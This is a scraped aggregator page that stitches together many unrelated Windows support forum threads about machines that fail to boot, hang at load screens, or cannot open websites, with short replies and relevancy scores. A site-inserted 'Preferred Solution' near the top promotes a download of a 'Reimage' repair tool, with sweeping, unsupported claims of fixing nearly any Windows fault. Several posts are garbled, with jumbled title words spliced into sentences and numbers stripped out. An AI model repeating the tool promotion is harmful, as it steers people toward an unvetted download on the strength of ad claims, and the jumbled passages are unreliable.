Windows Support Forum

Windows Xp Doesnt Wanna Load, I Gotta Restart To Make It To Load

Q: Windows Xp Doesnt Wanna Load, I Gotta Restart To Make It To Load

Windows Xp Doesnt Wanna Load I Gotta Restart To Make It To Load Before the repair it didnt wanna load at all - also I have some hard drive issues that got cut off and came our weird sorry ---------------------------------------------- OK Im gonna explain what happened step by step cause Im not sure whats important I dont understand very much about this stuff I hope someone more expirienced then me will help me out Im using windows xp proffessional version OK It first happened while I was surfing online I was surfing on sites that I can say are pretty much safe but at the same time I was running either AVG antivurus or their AVG antispyware not sure which one I Load, To It To Doesnt Wanna Windows Gotta Xp Restart Load Make of the two At some point when the scanning was on my E hard drive windows is on my C hard drive the computer froze and naturally I restarted But windows didnt wanna start after the restart it kept giving these messeges windows didnt shut down properly and it asked me to choose to start it in safe or normal or etc mode I tried every type of start mode it didnt work Windows wouldnt load and u know that line where windows loads would move a while and Windows Xp Doesnt Wanna Load, I Gotta Restart To Make It To Load then stop no responce no nothing So I tried restaring several times Same thing widnows didnt start properly last time choose a mode after I choose it loaded for a while but then stopped So I took it to the repair the re-installed my windows Now when I wanna start it it runs properly doesnt ask me to choose windows loads for a while but fails to load again I try restart and then it works But I gotta restart it every time Say I shut down my computer now I gotta start it and wait for it to fail once then restart it and then it loads properly Now about the antiviruses programs part While running AVG antispyware I kept getting messeges like - this file is not readable do a disk check chk dsk So I tried to do a disk check I went to my E hard drive choose properties then tools then error checking and check the boxes and click start But it took so long An hour and mins passed and it wasnt done even of the total hard drive BTW my hard drive is only gb but I have a lot of files stored on it especially websites html files Just as a comparison my AVG antivirus takes hours to scan my entire computer hard drive gb each so total and my AVG spyware tooks mins to h and most of the time they pass scanning my E hard drive I needed the computer urgently so I had to stop the scan after hour and mins and besides it looked stuck So I restarted the computer cause that was the only way to stop it and now I get a messege on every startup windows scans my E drive I know thats probably caused by me stopping it by restart so its now stuck but it can also signal a failing drive Another thing about the antispyware and antivirus programs the times so far when my computer froze it happened while I was scanning with either avg antivirus and avg antispyware and it happened while they were scanning my E hard drive Also I said already that my avg antispyware said some of my files on E are unreadable Looks like there is smth on my E hard drive maybe bad sectors or malware thats a low possibility cause i did several scans besides the times when my computer froze and they didnt detect anything Its weird how smtimes I do a scan and it goes ok but other times it freezes so it doesnt freeze on every scan So basically I start the computer and windows doesnt load properly It takes me to the screen where it says that its scanning my E drive but it scans and gets stuck there Then I restart it again and now it loads then it does a lil scan of my E hard drive and its little it doesnt take more then mins how can a disk check be so fast I waited for my C hard drive scan for a lot longer than that BTW I did a disk check on my C drive and then I wanted to do one on my E hard drive it took ages but my c drive has free gb out of gb and my E hard drive has only gb free so it has a lot more to scan After the under mins disk check of my E hard drive it says ok and windows loads properly BTW even before the E disk check run on every startup I had to do a restart to make it work but then it got stuck while windows loaded Thats my major problem the smaller one is getting that E disk check to stop to run on every startup but i found a site where it says i can change that in windows registry altho that looks scary is it scary Besides the startup issue and the freezes during some scans the computer works great so far I can run it for hours and hours and it doesnt give me problems until I restart or scan Help me out people I dont wanna take it again to the repair shop cause they will probably delete both of my hard drives cause thats the only logical answer i can think of rite now to stop this or they will reformat my hard drive that loses all data rite and i dont wanna to that Im doing a partial backup now just in case Say its a issue with my E hard drive as I said windows is on my C drive can it effect the windows startup I had to restart every time to make it load even before that scans E drive got stuck in my startup What is the problem with my computer Sorry for all the talk but I thought its best to say it all cause as I said i dont know too much about this stuff so I have no idea whats important Help me to fix this please

Relevancy 100%
Preferred Solution: Windows Xp Doesnt Wanna Load, I Gotta Restart To Make It To Load

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/directdownload.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: Windows Xp Doesnt Wanna Load, I Gotta Restart To Make It To Load

Are you able to boot in safe mode? It seems like you might have a conflict with the program wanting to run at start up..
My first suggestion is to boot safe mode, then remove your AV.. See if that helps..
Also, do you have more than one anti-virus program installed?

http://www.bleepingcomputer.com/forums/t/88845/windows-xp-doesnt-wanna-load-i-gotta-restart-to-make-it-to-load/
Relevancy 98.9%

If i restart my computer, it's as if it actually is rebooting, but it's like the graphics card isnt, because nothing comes up on the moniter. However, if I shut the computer down for about 10-30 seconds, it boots up fine. At first I thought the Gfx card was crapping out, i had a geforce 7600, so I bought a geforce 8800 gts and installed it and it's doing the same thing. Anyone have any suggestions? Much appreciated!Sean[Moderator edit: moved thread to more appropriate forum. jgweed]

A:On Restart, Gfx Doesnt Load

Hi Bulldog83, and welcome to BleepingComputer.Have you looked in the Event viewer to see what errors are showing up at these times. The error are recorded with the date and time that they occur.Start> right click on My Computer> Manage> Event Viewer. Be sure that you choose System.The error will appear in the far left column and will appear as a red dot with a white X inside. Each of the columns has a title at the top of them, the column that you want is the Event column. When you see an error follow it to the right across the page to the event column, there will be a set of numbers in there, this is the error code. If you right click on the error code a drop menu will appear, click on Properties, another page will open which will contain a description of the error.Please post the error codes and descriptions back in this topic.

http://www.bleepingcomputer.com/forums/t/145822/on-restart-gfx-doesnt-load/
Relevancy 93.74%

When I turn my computer, the windows logo appear but go to safe mode etc. after we choose anything computer stop loading in d347bus.sys then computer restart go back to safe mode etc. and if i push esc the loading d347bus.sys the computer go back again in safe mode etc (loop). whether or not I push esc it won't do anything else. How to repair it?

A:Load d347bus.sys make restart

Found this through Googling

This issue is caused by Demon Tool d347bus.sys has confilicting issues with SP2 & some other programs
U can fix this by booting to Win Cd Recovery mode.
then login to admin & delete the following
C:\windows\systems32\Drivers\d347bus.sys
Then exit...
your computer should reboot just fine thenClick to expand...

If it still doesn't work from doing this I can post a Repair guide, but I need your version of Windows, instead of just providing them all (Home Pro Vista Xp..)

http://www.techspot.com/community/topics/load-d347bus-sys-make-restart.115301/
Relevancy 90.3%

Hi
Wondering if someone can help me.

I am running Windows Vista Sp 1
For a little while i am unable to access my control panel. When i click on it, it comes up with a blank window(like its trying to open) and doesnt display anything. Also windows says cant check for updates.
Ive done some research and it tells me its got something to do with the SL UI Notification service. When i go to my services i can see its stopped. But when i start it, it stops striaght away.
Can someone help me to keep this strated permantly so i can recieve the updates as well as my control panel functioning properly
Look forward to hearing from an expert

A:Windows doesnt update + control panle doesnt load

When was it last.... there?

Run Vista System Restore -
START | rstrui - choose a restore point prior to the start of the missing sightings

Regards. . .

jcgriff2

http://www.techsupportforum.com/forums/f217/windows-doesnt-update-control-panle-doesnt-load-413575.html
Relevancy 83.85%

my laptop doesnt load .
after the stating windows logo the blue loading circle keeps on rotating and notting happens.
i recently happened to have another problem of error xc0000225 so i repaired my computer with the windows disc as said and after wards this happened please help.....
tried loading in safe mode but no progress...

EDIT : after around one hour the blue screen with windows 7 home premium logo(only) and without nothing else loaded..
afterward it turned to black screen with just the cursor..

A:doesnt load windows 7

Is your laptop new? Anything happened before the blue screen appeared?

steve barbarich

http://www.sevenforums.com/general-discussion/333327-doesnt-load-windows-7-a.html
Relevancy 83.85%

hi, i hope someone can help me, recently on my desktop i was getting the odd few errors messages and pop us, i was running all the pop up, spy ware software and all that and eventualy it seemed ok, then the other day when i went to load up my desktop computer, bascialy it wasnt loading up, when u turn it on the screen comes up with the makers logo whatever and then goes black turns itself off and on agian, i found my restore cds and loaded them up and did what it said, but they say some of the ghost files are missing or cant be read or something, i dont know whether the 2 events are connected but id love it if someone could help me get my desktop back up and running,

thanks alot

Robie

A:Windows doesnt load

Have you tried Safe Mode or used Last Know Good?

They are avialable from the boot menu using F8 when you boot the PC. Wait for the hardware to be listed before hitting F8.

https://forums.techguy.org/threads/windows-doesnt-load.452427/
Relevancy 83.85%

I have windows on a computer I am trying to fix. When you log into any of the accounts it takes ages for it to load the taskbar and anything else. Nothing loads properly. Any ideas what to do?

A:Windows XP Doesnt Load

It sounds like XP loads but just loads slowly. I would use msconfig to disable startups and services temporarily to isolate the problem.
Click start menu.
Click run.
Type MSCONFIG and click ok.
Click services tab.
Click hide all Microsoft services checkbox.
Click disable all.
Click the startup tab.
Click disable all.
Click OK and let it restart your computer.
When it gets back up everything including security software should not be running (so its not really a time to go surfing the web). Just see if it starts up faster. If not, you may have an infection or OS corruption. If its faster, you can try adding back the services and startups few by few until you find the one that's slowing everything down.

https://forums.techguy.org/threads/windows-xp-doesnt-load.839107/
Relevancy 83.85%

K so a little background info first I haven t used this computer in a month or so so I go back to boot it up I plug in all my stuff keyboard mouse monitor etc Only difference is im using an old LCD monitor So I boot up the computer and my Asus Motherboard screen comes on as usual then the next screen appears and then Windows is supposed to boot except it doesnt The Windows XP PRO screen with the loading bar doesn t even show up Things I have tried Safe mode when I use safe mode it begins to boot all the hardware stuff then it suddenly stops after this one hardware thing and nothing happens My hardware Windows XP Windows doesnt load? Professional Asus A NV-Deluxe SLI AMD X Corsair XMS PRO GB Maxtor GB Hardrive Nvidia GTX MB Enermax Watt Power Supply So my question is whats wrong Could it be because my monitor is soo old that its not displaying windows correctly It works on an old computer using an old graphics card w vga output What else could be the problem I haven t done anything new to it BTW nothing Windows doesnt load? is overclocked Help wld be appreciated nbsp

Relevancy 82.99%

Hi guys im new here but i need a lot of help from anymore windows doesnt :( load xp you guys i would realy appriciate tht so here is the situation i windows xp doesnt load anymore :( had virus in my laptop so i downlaod a software call avast virus removal i have tht software in my other desktop pc thtz why i decided download on my laptop when i did boot scan in my laptop with tht software it deleted all the virus but after tht my laptop dont let me log in like whn i put my password it just logs in nd the same time it say logging of saving programes after tht i used my windows xp cd to repair it b c i thought the antivirus software deleted all the files including the needs to log on the windows itz not the same cd which came with my laptop b c i cant find tht the was there it was sp the installed was sp so tht windows xp cd copied all the files but aftere tht my windows doesnt even load anymore like it dont even go to the login window it just starts nd shows the blue screen nd says windows is restarting plz plz plz help me thx nbsp

A:windows xp doesnt load anymore :(

Plz Help Guys

https://forums.techguy.org/threads/windows-xp-doesnt-load-anymore.778067/
Relevancy 82.13%

The computer is an HP Pavilion 724C with Windows xp Home edition, and McAfee Security (from Comcast).
When I start the PC, Windows starts as usual and gets to the choose User screen okay, but after the welcome screen (loading your Personal settings), the desktop background appears but no Icons or Start button or taskbar.

I'm unsure of what I did to cause this problem and I'm not very savvy on computers but you folks helped me out a while ago with a spyware problem, so I thought I'd try again before I give up and call HP or Microsoft.

Any and all help will be much appreciated

A:windows desktop doesnt load at start up

It's posssible that you could have a corrupt user profile.
Try this:
Boot into safe mode OR if you have more than one user account, try another desktop.
Start Menu/All Programs/Accessories.
System Tools/System Restore.
Choose a restore point just prior to when the issue began.

Your system will reboot, only after rebooting and getting on a desktop will you find out if the restore is successful.

http://www.bleepingcomputer.com/forums/t/232734/windows-desktop-doesnt-load-at-start-up/
Relevancy 82.13%

Hi All

My son's desktop HP compaq Intel Celeron 2.6 ghz, xp pro, 768 ram.

Problem started when windows splash screen started then stopped before getting to desktop. Screen went black. I started an xp repair but couldnt even get into recovery console (could not see windows directory?).

I suspected a hard drive/master book record failure and after installing fresh copies of windows twice (which went through the full set up process fine on both occasions) then went to boot up fresh and still got windows xp splash screen for a few seconds then black....ok so I removed hard drive put another one in a loaded windows on fresh (new partition/formatted etc.).

Same problem? Process of elimination now suggests not a hard drive problem.....

Any suggestions PLEASE?

A:Windows xp doesnt load after splash screen

Hi mardette, welcome to TSF.

Going by your description it would appear the graphics card is faulty, as that is about the time when it switches from low to hi graphics.

Try booting and tapping the F8 key to get the menu and select the vga mode to see if the desktop can be reached that way.

http://www.techsupportforum.com/forums/f10/windows-xp-doesnt-load-after-splash-screen-291418.html
Relevancy 82.13%

I upgraded windows from 8.1 to windows 10 pro... I intalled counter strike source at morning and restart my notebook... But it cant restart ... It says enter ur password when I entered password it only processes... Doesn't go further... From morning please help me...!!!

http://h30434.www3.hp.com/t5/Notebook-Operating-System-and-Recovery/windows-10-doesnt-load-it-stops-processing/td-p/5815295
Relevancy 82.13%

A friend of mine has a HP envy and when she turns it on it goes to the light blue screen and hangs there.  No cursor or anything.  After a few minutes it just powers down.   She said the issue started after the latest windows 10 update. I tried rolling it back prior to the last up date and no joy.  Theres 3 possible restore points but each one states theres a file that cant be changed and restore didnt work properly.  I thought it might be a boot issue so I ran the various boot file rebuild commands and managed to pull her windows 8.1 files.  I tried booting into 8.1 and the same issue happens.  The light blue screen then power down.  She also has bit locker in case thats a concern

http://www.bleepingcomputer.com/forums/t/623899/windows-10-doesnt-fully-load-then-powers-down/
Relevancy 81.27%

Hey guys im posting on behalf of my brother who gets frustrated and just wants to give up Basically what was happening was during game play his PC would randomly shut off It got worse as time progressed more fequent restarts and then not even being able to power the system up Now he has been getting a message after the post screen saying Windows did not start up please choose from a start up option somethingto to trying restart/Restart windows after Random load that extent then you can choose from safe mode or regular start up The problem here is that you cant select anything no keyboard Random restart/Restart after trying to load windows response and then windows automatically tries to load windows load screen and then a BSOD appears very briefly Random restart/Restart after trying to load windows and the system restarts Originally I thought his problem was cooling with the random restarts But then it started restarting after about a minute that the PC was on So I thought a dieing PSU But the windows restarting has got me thinking a bad hard drive or something as an extra bonus to bad power cooling This was a PC purchased from Ibuypower about years ago I hate that company with a passion nbsp

A:Random restart/Restart after trying to load windows

Hey I appologize for posting this under the wrong thread. Didnt relize what thread I was under when I posted.

http://www.techspot.com/community/topics/random-restart-restart-after-trying-to-load-windows.86509/
Relevancy 81.27%

hi. i got a new mother board and replaced it with my old one because it was faulty, i am sure i have everything in the right place, but when i turn on the computer windows xp loads a little bit then goes to a blue error screen. i have read many other forums saying that i have to put in the xp setup cd and repair it but.. when i put the cd in then boot it the cd loads the setup but just before i can choose the option for installation it goes back to that same blue error screen. any other way beside losing all my files?
help please =(

A:New Motherboard. Windows Xp not working. Setup Cd doesnt load

Please more details

From your post, it is not clear if you simply replaced the motherboard and expected everything to 'just work' after that. Sorry if I underestimate your knowledge, but if I happen to be right, you MUST install your motherboard drivers .... the only exception would be if replacing with an identical motherboard, and that, given the rate of change, would be almost impossible.

http://www.techspot.com/community/topics/new-motherboard-windows-xp-not-working-setup-cd-doesnt-load.39797/
Relevancy 79.55%

Just recently I have gotten something that I can not get rid of I have been running Malewarebytes and it found a few things and I cleaned them I also ran HouseCall and it found a few other things and proceeded with cleaning what that program had found I have run Mcafee and malewarebytes several times and in safe mode and they are showing windows to me Google load ad update and is sites doesnt redirecting site nothing is wrong at this point I also tried to run combofix as a suggestion from another IT friend and got a Google is redirecting me to ad sites and windows update site doesnt load blue screen after it installed the Microsoft Windows Recovery Console and will not run the scan and just goes to a blue screen The only info that I wrote down Google is redirecting me to ad sites and windows update site doesnt load during the process was from housecall from trendmicro when it found stuff called Adw Maxifiles Troj Fakeav Smes Expl Passrec A Troj Generic ADV Worm Palevo Au JS Agent ADV I have also run CCcleaner program to clean up any temp files Maleware found these Registry Keys Infected HKEY LOCAL MACHINE SOFTWARE avsoft Trojan Fraudpack - gt Quarantined and deleted successfully Registry Values Infected HKEY LOCAL MACHINE SOFTWARE Microsoft Windows CurrentVersion Run ejedsdyu Rogue AntivirusSuite Gen - gt Quarantined and deleted successfully Mcafee found something called Generic dx Trojan and was deleted Current Problem Everything seems to be ok except when browsing with IE and I do a search with google and then I click on the link and it takes me somewhere random usually an ad page or something with asklots com in the address If I right click the links in the google search and tell it to open a new tab they work just fine Also if I go to the windows update site to check for windows updates I get a blank page If I go to microsoft com and click on the links to check for updates I get quot The website has encountered a problem and cannot display the page you are trying to view The options provided below might help you solve the problem quot with an error of quot Error number x EFF quot My system is a Dell Optiplex with Microsoft XP Pro SP Looking for some help in what my next steps should be Thanks in advance

A:Google is redirecting me to ad sites and windows update site doesnt load

I have the same issue, have you found a resolution besides a reload? Thanks in advance!

http://www.bleepingcomputer.com/forums/t/330228/google-is-redirecting-me-to-ad-sites-and-windows-update-site-doesnt-load/
Relevancy 79.55%

This is a peculiar problem--When using the restart function (start--turn off computer---restart) windows will not reload---I get the post from the bios (hd is recognized) and can even enter my pwd to continue the reload process----But after entering my pwd---the screen goes blank and stays black----xp will not continue loading.

Now if I power off the pc using the power button---wait 10 seconds and then power on ---presto----xp loads as it should---what could be causing this peculiar problem----PS. using the reset button on the pc while xp is loaded-- forcing a restart yields the same results as in paragraph 1.

system
DFI lanparty mobo--nf4-ultra (socket 939)
Athlon 64 3.2 processor
ATI radeon 800 gto 256 mgb vid card
2 gig pc3200 400mghz memory modules--in slots 1 and 3(color coded) to use dual channel operation)
Win XP PRo sp2
Antec tru power 550 watt psu

Anyone have a clue as to what is going on??

A:Windows will not load after Restart

A bit weird. Has this started happening recently? Have you upgraded any computer component recently?

http://www.techsupportforum.com/forums/f10/windows-will-not-load-after-restart-248231.html
Relevancy 77.83%

Hi,

Yesterday I loaded my computer from hibernation, switched to the login screen when I had to leave my computer for a minute, and then came back and accidently restarted the computer after I signed in.

I'm not sure when the hibernate file is deleted or overwritten, but I would not allow Windows to load up again after the restart. A password is needed at bootup, so I shut the computer down instead of letting it load the OS.

Is there any way to get Windows to load the hibernation file? Since I had loaded the computer from hibernation before this, I'm guessing the file is still there, unless the restart caused it to be deleted. I'm using Windows 7 64-bit Professional.

Thanks

A:Any way to make Windows 7 load from Hibernation file?

Hello x8e925 Welcome to the Seven Forums!

First I will start off mentioning that back when 7 was first new and before the retail launch you could download a VM type program to launch 7 beta, RC builds from a usb flash drive. But the fast portable installs still required some form of boot loader and the OS was still loaded into the active ram(random access memory).

The best recommendation I generally give for how to go about seeing Windows load up properly following any period of hibernation or sleep mode besides the OEM form of resuming last session that can occur with a battery disruption(battery needs recharge or ac plug pulled out while Windows is running, etc.) is to simply plan to restart Windows so everything loads up fresh. That way device drivers are loaded fresh into memory once again rather then seeing Windows stall on you. It can save a number of headaches people report at times!

The only form of hibernation file you could see for 7 or any other OS for that matter wouldn't be your main OS to answer that question but a Virtual Machine where the Virtual Hard Disk(VHD) is a file stored locally on the main or other hard drive. That requires a program like VMware's VM Player or in the case of the XP Mode the Virtual Machine MS had provided Virtual PC 2009 or the previous Virtual PC 2007 people would run XP VMs with on the older Vista version.

When not in use the VM remains in a dormant mode as a file on the drive but not what you are looking for here. The fresh reboot when resuming or powering up fresh is the best way to avoid hangups.

http://www.sevenforums.com/general-discussion/342611-any-way-make-windows-7-load-hibernation-file.html
Relevancy 77.83%

I did a fresh install of windows on my ssd I unplugged the HDD while this occured Everything went smoothly When I plugged in the HDD I noticed a partition is also now on - SSD won't windows install load problems restart New on there Boot priority is set to the SSD and it is set to ahci mode in bios I noticed yesterday that updates had installed and when I turned on the New SSD install problems - won't load windows on restart monitor I have sleep disabled I got that screen that said that windows wasn't able to boot and was trying to run repair It said it couldn't repair When I went to restart it said it couldn't restart and asked if I wanted to restart or run that repair that I woke the computer to seeing Is the partition that installed when i plugged in the HDD necessary It does have an installation of Windows on it I only plan to boot windows off the SSD How do I fix the computer so it boots properly upon restart and do I need to do anything to the HDD that has windows on it also

A:New SSD install problems - won't load windows on restart

Post a screen shot of Windows Disk Management so we can see the details of your partitions on both drives.

You say "Is the partition that installed when I plugged in the HDD necessary?".

That's confusing. Simply plugging in a hard drive should not cause a partition to "install".

If the HDD was disconnected when Windows was installed to the SSD, the normally situation would be that the HDD could then be re-connected and you could then delete any or all partitions as you wish.

http://www.sevenforums.com/hardware-devices/215503-new-ssd-install-problems-wont-load-windows-restart.html
Relevancy 76.97%

I have two HDD, 1) 200GB and the 2) 80GB, I have windows xp installed on both. None of the two windows have logon password and each windows has one account only, plus the guest account.

I used the winodws Xp in the 80GB to take ownership of the user profile in Documents and Setting that is in the 200GB HDD, now I booted the computer with the 200GB HDD and it doesn't load the original user profile it made a new one.

So now I have two profiles in one user account:

Say the original profile is named A and the new one is named B, I want to delete B and make windows load A.

Thanks

A:how can I make windows load a specific user profile?

Hi JustinK. . .

Some clarification, please...

1. Did you install the SAME XP OS on both (using the same product code)?
2. Is your intent to have one HDD mirror the other?
3. Did you use an Admin account to take ownership of the user profile in the "Documents and Settings" on the 200GB HDD?
4. What is the purpose for taking ownership?
5. Can these 2 HDD's see each other and are they interactive with each other?
6. Do they each have an independant system registry, if you know?

Thanks. . .

jcgriff2

http://www.techsupportforum.com/forums/f10/how-can-i-make-windows-load-a-specific-user-profile-214297.html
Relevancy 76.97%

this morning everything was working fine, later today i was booting my computer, all seem normal until the load freeze and restart right away, i tryed to boot in safe mode but same problem, if someone have time to help i would appreciate it.

i have a acer aspire AST690-EP925A intel dual core 925

i tryed to unplug everything and replug but no success, i wish i could save what i have on my hard drive because most of the files are really important. thx in advance.

-The guys

Relevancy 76.97%

Hi,

Just a few hours ago, my daughter was playing a pc game, it froze, so she went to restart..she clicked Start and then on Restart. The computer restarted. Well, the computer keeps landing on that black screen saying Windows did not shut down properly. I have tried to restart the computer in all three Safe Modes, Last good configuration etc... it restarts and then comes back to that black page saying Windows has been shut down improperly. Windows will not load at all.

I tried searching for this topic already and I didn't see one that was like this, so I hope I am not asking a repeat question.

Thanks

oh and the operating system is Windows XP Professional

https://forums.techguy.org/threads/computer-stuck-on-restart-page-windows-wont-load.457079/
Relevancy 76.97%

Hi,

Just a few hours ago, my daughter was playing a pc game, it froze, so she went to restart..she clicked Start and then on Restart. The computer restarted. Well, the computer keeps landing on that black screen saying Windows did not shut down properly. I have tried to restart the computer in all three Safe Modes, Last good configuration etc... it restarts and then comes back to that black page saying Windows has been shut down improperly. Windows will not load at all.

I tried searching for this topic already and I didn't see one that was like this, so I hope I am not asking a repeat question. The operating system is Windows XP Professional.

Thanks

A:Computer Is Stuck At Restart Window/ Windows Won't Load

Hi, I seem to have a similar problem, although a bit more complicated. It also happened when playing a game, it happened to me on-line though. Was she playing on-line as well? Look into my topic to see if any responses I've received may apply to you.

http://www.bleepingcomputer.com/forums/t/49206/computer-is-stuck-at-restart-window-windows-wont-load/
Relevancy 76.97%

ok this is gonna be a bit long but i want the details there the issue pc is my old pc it has windows its an asus msn-la motherboard i cloned this drive and used it in my new pc after a few months my new pc's drive died and load finnaly does things takes it load to forever slow load pc once very i took the old drive from the issue pc witch was pc takes forever to load things load very slow once it does finnaly load not giving issues at this time and stuck it into my new pc until my replacement drive came when i got the replacement drive i cloned the drive again onto the replacement drive and then put the new drive in the new pc had no issues there put the old drive back pc takes forever to load things load very slow once it does finnaly load into pc takes forever to load things load very slow once it does finnaly load the issue pc this is when issues started the pc booted up to the windows desktop loading screen fast but once it got there it sat there for like min before loading into windows once it loaded into windows it was un usable for around min while it loaded background stuff once it finally loads into windows if i try to open anything its still responding extremely slow is there anything i could do to fix this or is this going to me a re install only situation i did try to use a windows disk to do a startup repair but it claimed i couldn't do it because i dident install from that disk

http://www.techsupportforum.com/forums/f217/pc-takes-forever-to-load-things-load-very-slow-once-it-does-finnaly-load-1145545.html
Relevancy 75.25%

new to this and not to good on the technical jargon..

basically i used to be able to load websites up then they stopped loading now and again and now they dont load at all.\
for eg: ebay i can go to the website search it all but click on the sign in and it just wont load.
there are other web pages which just wont load at all and just get the load thing and a blank screen.. and then time out.

ive done the AVG thing, spybot search and destroy, spyblaster.. and reset my router but stil nothing!!!

using windows xp and IE8

A:Can't load websites, or can load main page but then links don't load

How are you connected to the internet?

http://www.techspot.com/community/topics/cant-load-websites-or-can-load-main-page-but-then-links-dont-load.151298/
Relevancy 74.39%

Okay so here's the deal I had Windows Service Pack Everything was just lovely then I decided to FINALLY upgrade to Windows 3 Windows Boot Now won't past Service Pack Load Windows load Installed Screen Service Pack because some high end Adobe products I was installing suggested it for Installed Windows Service Pack 3 Now Windows won't load past Windows Boot Load Screen better compatibility Aiesh so I took the plunge and tried to upgrade to Windows Service Pack I was smart because of all the horror stories though and did a full backup up all my data including system state etc I set a system restore point the whole nine yards I upgraded with no problems but when the computer restarted it do so got past POST and the windows boot or load screen popped up with the loading bar but windows never loaded A lot of people report having problems where it get's past the windows load screen and just keeps cycle rebooting Or it'll load to the user selection screen welcome screen This is not me I am simply stuck at the windows load screen Picture below for reference So I booted into safe mode with networking searched for help EVERYWHERE and couldn't find any - By the way I could boot into safe mode safe mode with command prompt and safe mode with networking So I used my system restore point that had made before the SP upgrade and now I am typing to you from the comfort of my Service Pack But this ticks me off because I want SP on my system for the sake of those Adobe programs and just because I can't get the dern thing on there it bugs me Does anyone have a suggestion for me as to WHAT is stopping me from have a healthy running version of Windows Service Pack I ran the Service Pack install upgrade as an Administrator in safe mode with ANY program thing that could possibly affect it not running I thought I had all my bases covered but apparently not Any help suggestions It'd be nice for all the other people out there who are having this same problem to get an answer as well P S I am running Windows XP Media Center Edition Version Service Pack hopefully SP soon

A:Installed Windows Service Pack 3 Now Windows won't load past Windows Boot Load Screen

Hi sirdanceal0t,
I had a similar problem when Windows XP SP3 was released it was only designed for Intel processors, so if you have a AMD processor it will cause your system not to load, if you are running a AMD processor if i were you try and get back to the System Restore Point or if that fails reimage your pc and just before installing SP3 looks for the patch/fix for your processor model, then install SP3 and it should all be fine.

On the other hand if you have a Intel processor i woulldn't know what to advise.

Swain90

http://www.techsupportforum.com/forums/f10/installed-windows-service-pack-3-now-windows-wont-load-past-windows-boot-load-screen-418781.html
Relevancy 74.39%

I dont know if this is posted in the right area but I'm so desperate to get my laptop working its unreal First it started off with my laptop crashing I had totally forgot it needed to do a windows update and turned off my laptop in hopes that it would work properly After that my laptop has not been working The machine turns on and gives me two options Start windows normally or do a repair Upon starting windows normally it loads so far before sending me back to refuses and windows to load system 7 wont load repair the two options of windows 7 refuses to load and system repair wont load start windows normally or repair On the second time I clicked repair My laptop then goes so far before presenting me with a blue screen that is usually the screen where my accounts are The cursor still moves but it loads no further even after leaving it an hour I decided to make a repair disk hoping that the problem was because of windows the disk loads gives me a choice on the keyboard language then does nothing I honestly have no idea what to do I want to keep all the files safe on my computer as I havent backed them up and I have worked so hard on the projects someone please help

A:windows 7 refuses to load and system repair wont load

Do a hardware/software reset with your BIOS:Shut down and turn off the computer.
Unplug the computer from the wall or surge protector (then remove the battery if it is a laptop).
"Remove the computer from any port replicator or docking station, disconnect
cables to printers or devices such as external monitors, USB memory sticks or SD cards, headset or external speakers, mouse or auxiliary keyboard, turn off WIFI and Bluetooth wireless devices." (Use Hard Reset to Resolve Hardware and Software Issues HP Pavilion dv5000 Notebook PC series - HP Customer Care (United States - English))
Hold down the power button for 30 seconds. This closes the circuit and ensures all
power from components is drained to clear the software connections between the BIOS
and hardware and clear any corruption in the temporary memory.
(If it is a laptop, plug the battery back into the laptop and then) Plug the computer back into the wall. Do not reconnect any unnecessary peripherals; monitor, keyboard,
and mouse should suffice and be the only peripherals reconnected.
Turn it on to reinitialize the software connections between the BIOS and hardware

After doing those steps, clear your CMOS by entering the BIOS (see your system manual for steps to enter the BIOS), going to the EXIT screen, and loading setup/optimized defaults.

http://www.sevenforums.com/bsod-help-support/236921-windows-7-refuses-load-system-repair-wont-load.html
Relevancy 73.96%

Hi all,
Starting in preview build 14936, some web pages stopped opening. For example gmail web page, Facebook etc. It seems there is something, what prevents it to be fully downloaded and viewed.
I experience this behaviour in all standard web browsers. Firefox (49.0.2), IE 11, Chrome and also Edge.
Any suggestions will be high appreciated :-).
Thanks in advance

http://forums.windowscentral.com/ask-question/443549-some-web-pages-doesnt-load.html
Relevancy 73.96%

Hi after installing Avast AV my computer cant load vista. IT keeps going to startup repair and it gives me an error for windows registry. i idid a debbug and got no errors on the drive. Safe mode doesnt work.

A:Vista doesnt load

Hi and Welcome to TSF!

Have you tired to restore Windows to an older date?

http://www.techsupportforum.com/forums/f217/vista-doesnt-load-645444.html
Relevancy 73.96%

Hey Folks,

So my Win 7 7000 64x doesnt offer me the "press any key to load CD or DVD..." I have tried it on other laptops and it works. So it cant be the DVD. Im guessing its an issue with my lappy. Im running Win 7022 right now, 32 bit obviously. I have never tried to install 64 bit so I cant say whether or not my laptop can support it, though its Merom which technically should.

Laptop: Sony cr120e, Intel T7200, 4gb ram (upgraded from 2gb), bios R0231Q0

Any suggestions would be much appreciated!

Daim

A:Win 7 64x doesnt load at boot

Hello Daimler and welcome to Seven Forums.

You need to change the boot order , by entering your laptop's BIOS and setting the first boot device to be your DVDROM, not your Hard Disk.

Alternatively, some laptops have a bios option that displays a message during bootup to press some key for boot menu/boot options. You could that from there too if you can't enter your bios.

Hope it helps.

http://www.sevenforums.com/installation-setup/4964-win-7-64x-doesnt-load-boot.html
Relevancy 73.96%

firefox wont load anything it says it cant connect to the internet. i checked my firewall and thats not it i also checked my internet connection and its running fine but for some reason firefox just wont work anyone have any ideas on what i can do to fix this?

A:[SOLVED] FF doesnt load

Look under File to see if there's a checkmark next to 'Work Offline'

Which firewall are you using? Is there an entry allowing Firefox to access the internet? Have you tried disabling the firewall completely? Do Internet Explorer and your email client work?

http://www.techsupportforum.com/forums/f131/solved-ff-doesnt-load-333214.html
Relevancy 73.96%

I have a Compaq computer and when i start it the Compaq logo comes out and then the screen goes black. Not sure what the problem is or how to go around fixing it. Any suggestions?

http://www.techsupportforum.com/forums/f10/computer-doesnt-load-319521.html
Relevancy 73.96%

Hi. I just got this problem. I am using Firefox 3.5(newest version). Youtube worked and all of a sudden it doesn't want to load. On Internet Explorer it works fine. Any ideas? Could it be a virus? bad plugin/addon? How to I figure out? Thanks. I didn't do anything prior to getting this. I was just on youtube clicked a video and then it stopped.

A:Youtube doesnt load

What happens if you close Firefox and reopen it up again? Does it not work (on youtube) right from the start or does it work for a while then it all of a sudden stops...
try it a couple times and post back...

http://www.techsupportforum.com/forums/f131/youtube-doesnt-load-391589.html
Relevancy 73.96%

